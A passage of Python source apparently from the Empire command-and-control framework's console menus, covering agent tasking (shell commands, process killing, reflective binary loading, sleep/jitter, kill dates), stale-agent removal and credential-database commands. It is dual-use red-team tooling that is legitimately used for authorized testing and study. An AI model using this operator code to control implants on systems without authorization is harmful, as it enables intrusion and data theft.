endLine = ' '.join(line.split(' ')[1:])
mline = endLine.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
else:
# otherwise tab-complate the stager names
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in stagerNames if s.startswith(mline)]
def complete_uselistener(self, text, line, begidx, endidx):
"Tab-complete an uselistener command"
names = list(self.listeners.loadedListeners.keys())
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_setlist(self, text, line, begidx, endidx):
"Tab-complete a global list option"
options = ["listeners", "agents"]
if line.split(' ')[1].lower() in options:
return helpers.complete_path(text, line, arg=True)
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a global option."
options = ["ip_whitelist", "ip_blacklist", "obfuscate", "obfuscate_command"]
if line.split(' ')[1].lower() in options:
return helpers.complete_path(text, line, arg=True)
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_load(self, text, line, begidx, endidx):
"Tab-complete a module load path."
return helpers.complete_path(text, line)
def complete_reset(self, text, line, begidx, endidx):
"Tab-complete a global option."
return self.complete_set(text, line, begidx, endidx)
def complete_show(self, text, line, begidx, endidx):
"Tab-complete a global option."
return self.complete_set(text, line, begidx, endidx)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
commands = ["add", "remove", "export", "hash", "plaintext", "krbtgt"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in commands if s.startswith(mline)]
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_list(self, text, line, begidx, endidx):
"Tab-complete list"
return self.complete_setlist(text, line, begidx, endidx)
def complete_preobfuscate(self, text, line, begidx, endidx):
"Tab-complete an interact command"
options = [(option[len('/data/module_source/'):]) for option in helpers.get_module_source_files()]
options.append('all')
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
class SubMenu(cmd.Cmd):
def __init__(self, mainMenu):
cmd.Cmd.__init__(self)
self.mainMenu = mainMenu
def cmdloop(self):
if len(self.mainMenu.resourceQueue) > 0:
self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0))
cmd.Cmd.cmdloop(self)
def emptyline(self):
pass
def postcmd(self, stop, line):
if line == "back":
return True
if len(self.mainMenu.resourceQueue) > 0:
nextcmd = self.mainMenu.resourceQueue.pop(0)
if nextcmd == "lastautoruncmd":
raise Exception("endautorun")
self.cmdqueue.append(nextcmd)
def do_back(self, line):
"Go back a menu."
return True
def do_listeners(self, line):
"Jump to the listeners menu."
raise NavListeners()
def do_agents(self, line):
"Jump to the agents menu."
raise NavAgents()
def do_main(self, line):
"Go back to the main menu."
raise NavMain()
def do_resource(self, arg):
"Read and execute a list of Empire commands from a file."
self.mainMenu.resourceQueue.extend(self.mainMenu.buildQueue(arg))
def do_exit(self, line):
"Exit Empire."
raise KeyboardInterrupt
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
# print a nicely formatted help menu
# stolen/adapted from recon-ng
def print_topics(self, header, commands, cmdlen, maxcol):
if commands:
self.stdout.write("%s\n" % str(header))
if self.ruler:
self.stdout.write("%s\n" % str(self.ruler * len(header)))
for command in commands:
self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__))
self.stdout.write("\n")
# def preloop(self):
# traceback.print_stack()
class AgentsMenu(SubMenu):
"""
The main class used by Empire to drive the 'agents' menu.
"""
def __init__(self, mainMenu):
SubMenu.__init__(self, mainMenu)
self.doc_header = 'Commands'
# set the prompt text
self.prompt = '(Empire: ' + helpers.color("agents", color="blue") + ') > '
messages.display_agents(self.mainMenu.agents.get_agents_db())
def do_back(self, line):
"Go back to the main menu."
raise NavMain()
def do_autorun(self, line):
"Read and execute a list of Empire commands from a file and execute on each new agent \"autorun <resource file> <agent language>\" e.g. \"autorun /root/ps.rc powershell\". Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\""
line = line.strip()
if not line:
print(helpers.color(
"[!] You must specify a resource file, show or clear. e.g. 'autorun /root/res.rc powershell' or 'autorun clear'"))
return
cmds = line.split(' ')
resourceFile = cmds[0]
language = None
if len(cmds) > 1:
language = cmds[1].lower()
elif not resourceFile == "show" and not resourceFile == "clear":
print(helpers.color(
"[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc python'"))
return
# show the current autorun settings by language or all
if resourceFile == "show":
if language:
if language in self.mainMenu.autoRuns:
print(self.mainMenu.autoRuns[language])
else:
print("No autorun commands for language %s" % language)
else:
print(self.mainMenu.autoRuns)
# clear autorun settings by language or all
elif resourceFile == "clear":
if language and not language == "all":
if language in self.mainMenu.autoRuns:
self.mainMenu.autoRuns.pop(language)
else:
print("No autorun commands for language %s" % language)
else:
# clear all autoruns
self.mainMenu.autoRuns.clear()
# read in empire commands from the specified resource file
else:
self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True)
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
else:
self.mainMenu.do_list("agents " + str(line))
def do_rename(self, line):
"Rename a particular agent."
parts = line.strip().split(' ')
# name sure we get an old name and new name for the agent
if len(parts) == 2:
# replace the old name with the new name
self.mainMenu.agents.rename_agent(parts[0], parts[1])
else:
print(helpers.color("[!] Please enter an agent name and new name"))
def do_interact(self, line):
"Interact with a particular agent."
name = line.strip()
sessionID = self.mainMenu.agents.get_agent_id_db(name)
if sessionID and sessionID != '' and sessionID in self.mainMenu.agents.agents:
AgentMenu(self.mainMenu, sessionID)
else:
print(helpers.color("[!] Please enter a valid agent name"))
def do_kill(self, line):
"Task one or more agents to exit."
name = line.strip()
if name.lower() == 'all':
try:
choice = input(helpers.color('[>] Kill all agents? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_EXIT')
except KeyboardInterrupt:
print('')
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(name)
if sessionID and len(sessionID) != 0:
try:
choice = input(helpers.color("[>] Kill agent '%s'? [y/N] " % (name), 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_EXIT')
except KeyboardInterrupt:
print('')
else:
print(helpers.color("[!] Invalid agent name"))
def do_clear(self, line):
"Clear one or more agent's taskings."
name = line.strip()
if name.lower() == 'all':
self.mainMenu.agents.clear_agent_tasks_db('all')
elif name.lower() == 'autorun':
self.mainMenu.agents.clear_autoruns_db()
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(name)
if sessionID and len(sessionID) != 0:
self.mainMenu.agents.clear_agent_tasks_db(sessionID)
else:
print(helpers.color("[!] Invalid agent name"))
def do_sleep(self, line):
"Task one or more agents to 'sleep [agent/all] interval [jitter]'"
parts = line.strip().split(' ')
if len(parts) == 1:
print(helpers.color("[!] Please enter 'interval [jitter]'"))
elif parts[0].lower() == 'all':
delay = parts[1]
jitter = 0.0
if len(parts) == 3:
jitter = parts[2]
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent info in the database
self.mainMenu.agents.set_agent_field_db('delay', delay, sessionID)
self.mainMenu.agents.set_agent_field_db('jitter', jitter, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL',
'Set-Delay ' + str(delay) + ' ' + str(jitter))
# dispatch this event
message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to delay sleep/jitter %s/%s" % (delay, jitter)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
delay = parts[1]
jitter = 0.0
if len(parts) == 3:
jitter = parts[2]
if sessionID and len(sessionID) != 0:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db('delay', delay, sessionID)
self.mainMenu.agents.set_agent_field_db('jitter', jitter, sessionID)
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL',
'Set-Delay ' + str(delay) + ' ' + str(jitter))
# dispatch this event
message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to delay sleep/jitter %s/%s" % (delay, jitter)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
print(helpers.color("[!] Invalid agent name"))
def do_lostlimit(self, line):
"Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '"
parts = line.strip().split(' ')
if len(parts) == 1:
print(helpers.color("[!] Usage: 'lostlimit [agent/all] [number of missed callbacks]"))
elif parts[0].lower() == 'all':
lostLimit = parts[1]
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent info in the database
self.mainMenu.agents.set_agent_field_db('lost_limit', lostLimit, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-LostLimit ' + str(lostLimit))
# dispatch this event
message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to change lost limit %s" % (lostLimit)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
lostLimit = parts[1]
if sessionID and len(sessionID) != 0:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db('lost_limit', lostLimit, sessionID)
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', 'Set-LostLimit ' + str(lostLimit))
# dispatch this event
message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to change lost limit %s" % (lostLimit)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
print(helpers.color("[!] Invalid agent name"))
def do_killdate(self, line):
"Set the killdate for one or more agents (killdate [agent/all] 01/01/2016)."
parts = line.strip().split(' ')
if len(parts) == 1:
print(helpers.color("[!] Usage: 'killdate [agent/all] [01/01/2016]'"))
elif parts[0].lower() == 'all':
date = parts[1]
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('kill_date', date, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-KillDate " + str(date))
# dispatch this event
message = "[*] Tasked agent to set killdate to {}".format(date)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to set killdate to " + str(date)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
date = parts[1]
if sessionID and len(sessionID) != 0:
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('kill_date', date, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-KillDate " + str(date))
# dispatch this event
message = "[*] Tasked agent to set killdate to {}".format(date)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to set killdate to " + str(date)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
print(helpers.color("[!] Invalid agent name"))
def do_workinghours(self, line):
"Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00)."
parts = line.strip().split(' ')
if len(parts) == 1:
print(helpers.color("[!] Usage: 'workinghours [agent/all] [9:00-17:00]'"))
elif parts[0].lower() == 'all':
hours = parts[1]
hours = hours.replace(',', '-')
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('working_hours', hours, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-WorkingHours " + str(hours))
# dispatch this event
message = "[*] Tasked agent to set working hours to {}".format(hours)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to set working hours to %s" % (hours)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(parts[0])
hours = parts[1]
hours = hours.replace(",", "-")
if sessionID and len(sessionID) != 0:
# update this agent's field in the database
self.mainMenu.agents.set_agent_field_db('working_hours', hours, sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-WorkingHours " + str(hours))
# dispatch this event
message = "[*] Tasked agent to set working hours to {}".format(hours)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(sessionID))
# update the agent log
msg = "Tasked agent to set working hours to %s" % (hours)
self.mainMenu.agents.save_agent_log(sessionID, msg)
else:
print(helpers.color("[!] Invalid agent name"))
def do_remove(self, line):
"Remove one or more agents from the database."
name = line.strip()
if name.lower() == 'all':
try:
choice = input(helpers.color('[>] Remove all agents from the database? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
self.mainMenu.agents.remove_agent_db('%')
except KeyboardInterrupt:
print('')
elif name.lower() == 'stale':
# remove 'stale' agents that have missed their checkin intervals
all_agents = Session().query(models.Agent).all()
for agent in all_agents:
if agent.stale:
# if the last checkin time exceeds the limit, remove it
Session().delete(agent)
Session().commit()
elif name.isdigit():
# if we're removing agents that checked in longer than X minutes ago
all_agents = Session().query(models.Agent).all()
try:
minutes = int(line.strip())
# grab just the agents active within the specified window (in minutes)
for agent in all_agents:
diff = helpers.getutcnow() - agent.lastseen_time
too_old = diff.total_seconds() > int(minutes) * 60
if too_old:
# if the last checkin time exceeds the limit, remove it
Session().delete(agent)
Session().commit()
except:
print(helpers.color("[!] Please enter the minute window for agent checkin."))
else:
# extract the sessionID and clear the agent tasking
session_id = self.mainMenu.agents.get_agent_id_db(name)
if session_id and len(session_id) != 0:
self.mainMenu.agents.remove_agent_db(session_id)
else:
print(helpers.color("[!] Invalid agent name"))
def do_usestager(self, line):
"Use an Empire stager."
parts = line.split(' ')
if parts[0] not in self.mainMenu.stagers.stagers:
print(helpers.color("[!] Error: invalid stager module"))
elif len(parts) == 1:
stager_menu = StagerMenu(self.mainMenu, parts[0])
stager_menu.cmdloop()
elif len(parts) == 2:
listener = parts[1]
if not self.mainMenu.listeners.is_listener_valid(listener):
print(helpers.color("[!] Please enter a valid listener name or ID"))
else:
self.mainMenu.stagers.set_stager_option('Listener', listener)
stager_menu = StagerMenu(self.mainMenu, parts[0])
stager_menu.cmdloop()
else:
print(helpers.color("[!] Error in AgentsMenu's do_userstager()"))
def do_usemodule(self, line):
"Use an Empire PowerShell module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = line.strip().rstrip("*")
if module not in self.mainMenu.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
# set agent to "all"
module_menu = ModuleMenu(self.mainMenu, line, agent="all")
module_menu.cmdloop()
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
searchTerm = line.strip()
if searchTerm.strip() == "":
print(helpers.color("[!] Please enter a search term."))
else:
self.mainMenu.modules.search_modules(searchTerm)
def do_uselistener(self, line):
"Use an Empire listener module."
parts = line.split(' ')
if parts[0] not in self.mainMenu.listeners.loadedListeners:
print(helpers.color("[!] Error: invalid listener module"))
else:
listenerMenu = ListenerMenu(self.mainMenu, parts[0])
listenerMenu.cmdloop()
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.mainMenu.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
if sys.version[0] != "2":
names_return = b','.join(names).decode("UTF-8").split(',')
else:
names_return = names
return [s[offs:] for s in names_return if s.startswith(mline)]
def complete_rename(self, text, line, begidx, endidx):
"Tab-complete a rename command"
return self.complete_interact(text, line, begidx, endidx)
def complete_clear(self, text, line, begidx, endidx):
"Tab-complete a clear command"
names = self.mainMenu.agents.get_agent_names_db() + ["all", "autorun"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_remove(self, text, line, begidx, endidx):
"Tab-complete a remove command"
names = self.mainMenu.agents.get_agent_names_db() + ["all", "stale"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_list(self, text, line, begidx, endidx):
"Tab-complete a list command"
options = ["stale"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_kill(self, text, line, begidx, endidx):
"Tab-complete a kill command"
return self.complete_clear(text, line, begidx, endidx)
def complete_sleep(self, text, line, begidx, endidx):
"Tab-complete a sleep command"
return self.complete_clear(text, line, begidx, endidx)
def complete_lostlimit(self, text, line, begidx, endidx):
"Tab-complete a lostlimit command"
return self.complete_clear(text, line, begidx, endidx)
def complete_killdate(self, text, line, begidx, endidx):
"Tab-complete a killdate command"
return self.complete_clear(text, line, begidx, endidx)
def complete_workinghours(self, text, line, begidx, endidx):
"Tab-complete a workinghours command"
return self.complete_clear(text, line, begidx, endidx)
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path"
return self.mainMenu.complete_usemodule(text, line, begidx, endidx)
def complete_usestager(self, text, line, begidx, endidx):
"Tab-complete an Empire stager module path."
return self.mainMenu.complete_usestager(text, line, begidx, endidx)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
return self.mainMenu.complete_creds(text, line, begidx, endidx)
class AgentMenu(SubMenu):
"""
An abstracted class used by Empire to determine which agent menu type
to instantiate.
"""
def __init__(self, mainMenu, sessionID):
agentLanguage = mainMenu.agents.get_language_db(sessionID)
if agentLanguage.lower() == 'powershell':
agent_menu = PowerShellAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
elif agentLanguage.lower() == 'python':
agent_menu = PythonAgentMenu(mainMenu, sessionID)
agent_menu.cmdloop()
else:
print(helpers.color("[!] Agent language %s not recognized." % (agentLanguage)))
class PowerShellAgentMenu(SubMenu):
"""
The main class used by Empire to drive an individual 'agent' menu.
"""
def __init__(self, mainMenu, sessionID):
SubMenu.__init__(self, mainMenu)
self.sessionID = sessionID
self.doc_header = 'Agent Commands'
dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any)
# try to resolve the sessionID to a name
name = self.mainMenu.agents.get_agent_name_db(sessionID)
# set the text prompt
self.prompt = '(Empire: ' + helpers.color(name, 'red') + ') > '
# agent commands that have opsec-safe alises in the agent code
self.agentCommands = ['ls', 'dir', 'rm', 'del', 'cp', 'copy', 'pwd', 'cat', 'cd', 'mkdir', 'rmdir', 'mv',
'move', 'ipconfig', 'ifconfig', 'route', 'reboot', 'restart', 'shutdown', 'ps',
'tasklist', 'getpid', 'whoami', 'getuid', 'hostname']
# display any results from the database that were stored
# while we weren't interacting with the agent
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print("\n" + results.rstrip('\r\n'))
# def preloop(self):
# traceback.print_stack()
def handle_agent_event(self, signal, sender):
"""
Handle agent event signals
"""
# load up the signal so we can inspect it
try:
signal_data = json.loads(signal)
except ValueError:
print(helpers.color("[!] Error: bad signal recieved {} from sender {}".format(signal, sender)))
return
if '{} returned results'.format(self.sessionID) in signal:
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print("\n" + helpers.color(results))
def default(self, line):
"Default handler"
line = line.strip()
parts = line.split(' ')
if len(parts) > 0:
# check if we got an agent command
if parts[0] in self.agentCommands:
shellcmd = ' '.join(parts)
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", shellcmd)
# dispatch this event
message = "[*] Tasked agent to run command {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'command': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run command " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else:
print(helpers.color("[!] Command not recognized."))
print(helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands."))
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
if args[0].lower() == "agentcmds":
print("\n" + helpers.color("[*] Available opsec-safe agent commands:\n"))
print(" " + messages.wrap_columns(", ".join(self.agentCommands), ' ', width1=50, width2=10,
indent=5) + "\n")
else:
SubMenu.do_help(self, *args)
def do_dirlist(self, line):
"Tasks an agent to store the contents of a directory in the database."
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_DIR_LIST", line)
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
else:
print(helpers.color("[!] Please use 'list [agents/listeners] <modifier>'."))
def do_rename(self, line):
"Rename the agent."
parts = line.strip().split(' ')
oldname = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# name sure we get a new name to rename this agent
if len(parts) == 1 and parts[0].strip() != '':
# replace the old name with the new name
result = self.mainMenu.agents.rename_agent(oldname, parts[0])
if result:
self.prompt = "(Empire: " + helpers.color(parts[0], 'red') + ") > "
else:
print(helpers.color("[!] Please enter a new name for the agent"))
def do_info(self, line):
"Display information about this agent"
# get the agent name, if applicable
agent = self.mainMenu.agents.get_agent_db(self.sessionID)
messages.display_agent(agent)
def do_exit(self, line):
"Task agent to exit."
try:
choice = input(helpers.color("[>] Task agent to exit? [y/N] ", "red"))
if choice.lower() == "y":
self.mainMenu.agents.add_agent_task_db(self.sessionID, 'TASK_EXIT')
# dispatch this event
message = "[*] Tasked agent to exit"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to exit")
raise NavAgents
except KeyboardInterrupt:
print("")
def do_clear(self, line):
"Clear out agent tasking."
self.mainMenu.agents.clear_agent_tasks_db(self.sessionID)
def do_jobs(self, line):
"Return jobs or kill a running job."
parts = line.split(' ')
if len(parts) == 1:
if parts[0] == '':
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_GETJOBS")
# dispatch this event
message = "[*] Tasked agent to get running jobs"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get running jobs")
else:
print(helpers.color("[!] Please use form 'jobs kill JOB_ID'"))
elif len(parts) == 2:
jobID = parts[1].strip()
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_STOPJOB", jobID)
# dispatch this event
message = "[*] Tasked agent to stop job {}".format(jobID)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to stop job " + str(jobID))
def do_sleep(self, line):
"Task an agent to 'sleep interval [jitter]'"
parts = line.strip().split(' ')
if len(parts) > 0 and parts[0] != "":
delay = parts[0]
jitter = 0.0
if len(parts) == 2:
jitter = parts[1]
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("delay", delay, self.sessionID)
self.mainMenu.agents.set_agent_field_db("jitter", jitter, self.sessionID)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL",
"Set-Delay " + str(delay) + ' ' + str(jitter))
# dispatch this event
message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_lostlimit(self, line):
"Task an agent to change the limit on lost agent detection"
parts = line.strip().split(' ')
if len(parts) > 0 and parts[0] != "":
lostLimit = parts[0]
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("lost_limit", lostLimit, self.sessionID)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-LostLimit " + str(lostLimit))
# dispatch this event
message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to change lost limit " + str(lostLimit)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_kill(self, line):
"Task an agent to kill a particular process name or ID."
parts = line.strip().split(' ')
process = parts[0]
if process == "":
print(helpers.color("[!] Please enter a process name or ID."))
else:
# if we were passed a process ID
if process.isdigit():
command = "Stop-Process " + str(process) + " -Force"
else:
# otherwise assume we were passed a process name
# so grab all processes by this name and kill them
command = "Get-Process " + str(process) + " | %{Stop-Process $_.Id -Force}"
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", command)
# dispatch this event
message = "[*] Tasked agent to kill process {}".format(process)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
msg = "Tasked agent to kill process: " + str(process)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_killdate(self, line):
"Get or set an agent's killdate (01/01/2016)."
parts = line.strip().split(' ')
date = parts[0]
if date == "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Get-KillDate")
# dispatch this event
message = "[*] Tasked agent to get KillDate"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get KillDate")
else:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("kill_date", date, self.sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-KillDate " + str(date))
# dispatch this event
message = "[*] Tasked agent to set KillDate to {}".format(date)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to set killdate to " + str(date)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_workinghours(self, line):
"Get or set an agent's working hours (9:00-17:00)."
parts = line.strip().split(' ')
hours = parts[0]
if hours == "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Get-WorkingHours")
# dispatch this event
message = "[*] Tasked agent to get working hours"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get working hours")
else:
hours = hours.replace(",", "-")
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("working_hours", hours, self.sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-WorkingHours " + str(hours))
# dispatch this event
message = "[*] Tasked agent to set working hours to {}".format(hours)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to set working hours to " + str(hours)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_shell(self, line):
"Task an agent to use a shell command."
line = line.strip()
if line != "":
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "shell " + str(line))
# dispatch this event
message = "[*] Tasked agent to run shell command {}".format(line)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run shell command " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_reflectiveload(self, line):
"Task an agent to use a shell command."
line = line.strip()
if line != "":
# task the agent with this shell command
data = open(line, "rb").read()
encoded = base64.b64encode(data).decode('latin-1')
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "reflectiveload " + encoded)
# dispatch this event
message = "[*] Tasked agent to reflectively load binary".format(line)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run shell command " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_sysinfo(self, line):
"Task an agent to get system information."
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SYSINFO")
# dispatch this event
message = "[*] Tasked agent to get system information"
